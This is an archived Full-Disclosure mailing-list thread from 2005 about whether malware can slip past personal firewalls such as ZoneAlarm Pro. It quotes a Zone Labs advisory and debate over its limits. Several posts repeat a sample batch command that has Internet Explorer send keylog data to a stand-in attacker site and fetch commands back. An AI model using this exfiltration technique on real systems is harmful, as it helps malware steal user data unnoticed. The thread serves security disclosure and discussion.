Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
nothing much... i was just Tested stuffs on Zone Alarm Pro 6.0.667.000 i bunped into something intresting. A test program 'evil.exe' went to a infinite recursive loop. No wounder, soon the system out of memory. but my BIG surprise vsmon.exe CRASHED ( testing on winxp sp2, with Admin privilage) I manage to KILL the process of EVIL.exe & system returned to normal functioning but FIREWALL DOWN! huh! -bipin On 10/4/05, Debasis Mohanty <[EMAIL PROTECTED]> wrote: > Hey AZ, > > Andrei Zlate-Podani wrote: > >> A firewall has to do with network traffic. All this talk about "bypassing > firewall x or y using this > >> trick or that one" is sheer nonsense. > > I just noticed "@bitdefender.com" in your ID and I am sure you must be > knowing better than me in all aspect as far as AV / Firewall goes. > Unfortunately I have to exaplain you that ZA Pro and its siblings are much > more than normal personal fw which even includes many of those > functionalities which takes care of most of the local OS based attacks and > even much more. > > >> It is not the job of a firewall to track all the relations of executables > and/or API calls in the system. > > You are right as long as you are talking about old school days firewalls... > ;-) I would like to suggest you give a shot to ZA Pro / Internet Security > Suit once most of your doubts about current days fw will be clear :) > > >> I never heard anybody complaining that iptables allows a script execute > Conqueror to communicate with a server. > > Is it ?? What a coincidence, Infact me too never heard :P > > > >> Use an antivirus program or an IDS for this job. > > Nice suggestion !!! Which products are you going to suggest to the home pc > users and corporate end-users?? > > > >> Andrei > > Bah ... D > -- Bipin Gautam Zeroth law of security: The possibility of poking a system from lower privilege is zero unless & until there is possibility of direct, indirect or consequential communication between the two... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Hey AZ, Andrei Zlate-Podani wrote: >> A firewall has to do with network traffic. All this talk about "bypassing firewall x or y using this >> trick or that one" is sheer nonsense. I just noticed "@bitdefender.com" in your ID and I am sure you must be knowing better than me in all aspect as far as AV / Firewall goes. Unfortunately I have to exaplain you that ZA Pro and its siblings are much more than normal personal fw which even includes many of those functionalities which takes care of most of the local OS based attacks and even much more. >> It is not the job of a firewall to track all the relations of executables and/or API calls in the system. You are right as long as you are talking about old school days firewalls... ;-) I would like to suggest you give a shot to ZA Pro / Internet Security Suit once most of your doubts about current days fw will be clear :) >> I never heard anybody complaining that iptables allows a script execute Conqueror to communicate with a server. Is it ?? What a coincidence, Infact me too never heard :P >> Use an antivirus program or an IDS for this job. Nice suggestion !!! Which products are you going to suggest to the home pc users and corporate end-users?? >> Andrei Bah ... D Aditya Deshmukh wrote: >>say... a backdoor want to communicate to its server... It can do >>is, use a trusted internal application to do the job. Suppose; it >>creates a batch file run the batch file (evil.bat) & executes this >>command >> >> > >this has been going on for years - there are some trojans that create >An invisible browser window at the screen center to comm with the >Server. > >This is the reason most firewalls like show you a popup saying the >[app-name] trying to connect to [server-name] at [port-number] > > > > > > >___ >_ Delivered using the Free Personal Edition of Mailtraq >(www.mailtraq.com) ___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- Ignorance more frequently begets confidence than does knowledge. --- Charles Darwin -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://www.bitdefender.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
A firewall has to do with network traffic. All this talk about "bypassing firewall x or y using this trick or that one" is sheer nonsense. It is not the job of a firewall to track all the relations of executables and/or API calls in the system. I never heard anybody complaining that iptables allows a script execute Conqueror to communicate with a server. Use an antivirus program or an IDS for this job. Andrei Aditya Deshmukh wrote: say... a backdoor want to communicate to its server... It can do is, use a trusted internal application to do the job. Suppose; it creates a batch file run the batch file (evil.bat) & executes this command this has been going on for years - there are some trojans that create An invisible browser window at the screen center to comm with the Server. This is the reason most firewalls like show you a popup saying the [app-name] trying to connect to [server-name] at [port-number] Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ignorance more frequently begets confidence than does knowledge. --- Charles Darwin -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://www.bitdefender.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
> say... a backdoor want to communicate to its server... It can do > is, use a trusted internal application to do the job. Suppose; it > creates a batch file run the batch file (evil.bat) & executes this > command this has been going on for years - there are some trojans that create An invisible browser window at the screen center to comm with the Server. This is the reason most firewalls like show you a popup saying the [app-name] trying to connect to [server-name] at [port-number] Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I think the main problem of every kind of security precaution is, that the user has to understand what he is being told. i had customers who just let everything in and out because they thought that their setup would need it. a few major tricks in really securing a sys: never let the user have write access to c:\putyourwindowssystemdirhere never run anything as admin user (at least since xp there is even something like sudo under windows available, called runas, very useful command). further on the xp level: try to get used to the netsh command. keep your system updated and doesnt matter what you download, as long as you keep your users security aware (password length and strongeness, email clicking, banner clicking, popups, etc...) or use an alternate os (yes, they are out there...) you can make it easier for your user or harder for your user, depending on your standpoint, but nothing is as good as a user that actually does know what he/she is doing. just my few cents. Greetings Oliver Leitner Technical Staff http://www.shells.at Debasis Mohanty wrote: > Just to correct my last statement in my previous reply - > >>>There is another way by which an evil-code can get this run is by moving > > the batch file to system startup > >>>or pointing it in the registry to run on system boot but this will be a > > warning signal for the user. > > Even ZA Pro blocks and warns the user if some program (evil or trusted) is > trying to become a system startup program. Sorry for that mistake had tooo > much with Paul & Zone Labs ;-) > > -D > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Debasis > Mohanty > Sent: Tuesday, October 04, 2005 12:25 AM > To: 'Bipin Gautam'; 'Zone Labs Security Team' > Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com > Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that* > hard? > > Bipin Gautam wrote: > >>>Anyways... is Bypassing Personal Firewall & let an internal (evil) > > application communicate > >>>with the external world, the hard. > > > Yes Indeed !! As long as you are trying out this concept with the current > versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it > even traps inter-process communications and windows messaging between two > different processes and prompts for user's permission. This goes ahead of > normal desktop based fw with more defense methods than just protecting a PC > from network based attacks. > > > >>>Suppose; it creates a batch file run the batch file (evil.bat) & > > executes this command > >>>Internet Explorer\> iexplore.exe > > www.EvilSite.com/?cmd=submit&f=___KeyLog__ > > To execute the batch file, the evil-program needs to trigger the execution > of the batch file and this is easily prevented by ZA Pro.. Normally the > evil-code will use the api shell() which is prevented. > > However, this will work if the users click on the batch file or run it via > Start->Run but this is not the way a evil-code works. In this scenario > Start->ZA > Pro clearly distinguishes between user interventions and a program > communicating with another program. > > > There is another way by which an evil-code can get this run is by moving the > batch file to system startup or pointing it in the registry to run on system > boot but this will be a warning signal for the user. > > - D > > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam > Sent: Monday, October 03, 2005 11:57 PM > To: Zone Labs Security Team > Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com > Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard? > > hello list, > Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is > Bypassing Personal Firewall & let an internal (evil) application communicate > with the external world, the hard. I mean... OK try this Lets.. me > give you a simple concept. I'll call it 'passive communication' ( in lack of > better world) > > say... a backdoor want to communicate to its server... It can do is, use > a trusted internal application to do the job. Suppose; it creates a batch > file run the batch file (evil.bat) & executes this command > > Internet Explorer\> iexplore.exe > www.EvilSite.com/?cmd=submit&f=___KeyLog__ > > the batch file will get executed & Internet explorer will happily send the > DATA. This trick can be used to send
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Just to correct my last statement in my previous reply - >> There is another way by which an evil-code can get this run is by moving the batch file to system startup >> or pointing it in the registry to run on system boot but this will be a warning signal for the user. Even ZA Pro blocks and warns the user if some program (evil or trusted) is trying to become a system startup program. Sorry for that mistake had tooo much with Paul & Zone Labs ;-) -D -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Debasis Mohanty Sent: Tuesday, October 04, 2005 12:25 AM To: 'Bipin Gautam'; 'Zone Labs Security Team' Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard? Bipin Gautam wrote: >> Anyways... is Bypassing Personal Firewall & let an internal (evil) application communicate >> with the external world, the hard. Yes Indeed !! As long as you are trying out this concept with the current versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it even traps inter-process communications and windows messaging between two different processes and prompts for user's permission. This goes ahead of normal desktop based fw with more defense methods than just protecting a PC from network based attacks. >> Suppose; it creates a batch file run the batch file (evil.bat) & executes this command >> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__ To execute the batch file, the evil-program needs to trigger the execution of the batch file and this is easily prevented by ZA Pro.. Normally the evil-code will use the api shell() which is prevented. However, this will work if the users click on the batch file or run it via Start->Run but this is not the way a evil-code works. In this scenario Start->ZA Pro clearly distinguishes between user interventions and a program communicating with another program. There is another way by which an evil-code can get this run is by moving the batch file to system startup or pointing it in the registry to run on system boot but this will be a warning signal for the user. - D -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam Sent: Monday, October 03, 2005 11:57 PM To: Zone Labs Security Team Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard? hello list, Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is Bypassing Personal Firewall & let an internal (evil) application communicate with the external world, the hard. I mean... OK try this Lets.. me give you a simple concept. I'll call it 'passive communication' ( in lack of better world) say... a backdoor want to communicate to its server... It can do is, use a trusted internal application to do the job. Suppose; it creates a batch file run the batch file (evil.bat) & executes this command Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__ the batch file will get executed & Internet explorer will happily send the DATA. This trick can be used to send OUTPUT as well as get input... without trigering the firewall. To get input; the backdoor can do is... say, run similar BAT script: Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS well... the history of the page www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if there is any new job to acomplish. just a rough theory... but ya its POSSIBLE; to let a internal backdoor have I/O with its server without trigering the firewall alert --- yap it does work... using the same trick can't the backdoor happily communicate with its server using the trick On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote: > Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) > Using DDE-IPC" > > Overview: > > Debasis Mohanty published a notice about a potential security issue > with personal firewalls to several security email lists on > September 28th, 2005. Zone Labs has investigated his claims > and has determined that current versions of Zone Labs and Check Point > end-point security products are not vulnerable. > > > Description: > > The proof-of-concept code published uses the Windows API function > ShellExecute() to launch a trusted program that is used to access the > network on behalf of the untrusted program, thereby accessing the > network without warning from the firewall. > > > Impact: > > If successfully
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
> integrated HIPS. (although a fonction which >can be very annoying sometimes.) To be more precise they call it "behavior blocking". -- Thierry Zoller mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Bipin Gautam wrote: >> Anyways... is Bypassing Personal Firewall & let an internal (evil) application communicate >> with the external world, the hard. Yes Indeed !! As long as you are trying out this concept with the current versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it even traps inter-process communications and windows messaging between two different processes and prompts for user's permission. This goes ahead of normal desktop based fw with more defense methods than just protecting a PC from network based attacks. >> Suppose; it creates a batch file run the batch file (evil.bat) & executes this command >> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__ To execute the batch file, the evil-program needs to trigger the execution of the batch file and this is easily prevented by ZA Pro.. Normally the evil-code will use the api shell() which is prevented. However, this will work if the users click on the batch file or run it via Start->Run but this is not the way a evil-code works. In this scenario ZA Pro clearly distinguishes between user interventions and a program communicating with another program. There is another way by which an evil-code can get this run is by moving the batch file to system startup or pointing it in the registry to run on system boot but this will be a warning signal for the user. - D -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam Sent: Monday, October 03, 2005 11:57 PM To: Zone Labs Security Team Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard? hello list, Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is Bypassing Personal Firewall & let an internal (evil) application communicate with the external world, the hard. I mean... OK try this Lets.. me give you a simple concept. I'll call it 'passive communication' ( in lack of better world) say... a backdoor want to communicate to its server... It can do is, use a trusted internal application to do the job. Suppose; it creates a batch file run the batch file (evil.bat) & executes this command Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__ the batch file will get executed & Internet explorer will happily send the DATA. This trick can be used to send OUTPUT as well as get input... without trigering the firewall. To get input; the backdoor can do is... say, run similar BAT script: Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS well... the history of the page www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if there is any new job to acomplish. just a rough theory... but ya its POSSIBLE; to let a internal backdoor have I/O with its server without trigering the firewall alert --- yap it does work... using the same trick can't the backdoor happily communicate with its server using the trick On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote: > Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) > Using DDE-IPC" > > Overview: > > Debasis Mohanty published a notice about a potential security issue > with personal firewalls to several security email lists on > September 28th, 2005. Zone Labs has investigated his claims > and has determined that current versions of Zone Labs and Check Point > end-point security products are not vulnerable. > > > Description: > > The proof-of-concept code published uses the Windows API function > ShellExecute() to launch a trusted program that is used to access the > network on behalf of the untrusted program, thereby accessing the > network without warning from the firewall. > > > Impact: > > If successfully exploited, a malicious program may be able to > access the network via a trusted program. The ability to > access the network would be limited to the functionality of the > trusted program. > > > Unaffected Products: > > ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and > ZoneAlarm Security Suite version 6.0 or later automatically protect > against this attack in the default configuration. > > ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and > ZoneAlarm Security Suite version 5.5 are protected against this attack > by enabling the "Advanced Program Control" feature. > > Check Point Integrity client versions 6.0 and 5.5 are protected > against this attack by enabling the "Advanced Program Control" feature. > > > Affected Products: > > ZoneAlarm free versions lack the "Advanced Program Control" > feature and are therefore unable to prevent this bypass technique. > > > Recommended Actions: > > Subscribers should upgrade to the latest version of their ZoneAlarm > product or enable the "Advan
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Bipin, That's very old news, we were discussing an approach a bit more elgant than this. And yes, it's that hard nowadays Kerio will easily block your bat file due to it's integrated HIPS. (although a fonction which can be very annoying sometimes.) BG> the batch file will get executed & Internet explorer will happily send BG> the DATA. This trick can be used to send OUTPUT as well as get BG> input... without trigering the firewall. Thierry Zoller mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/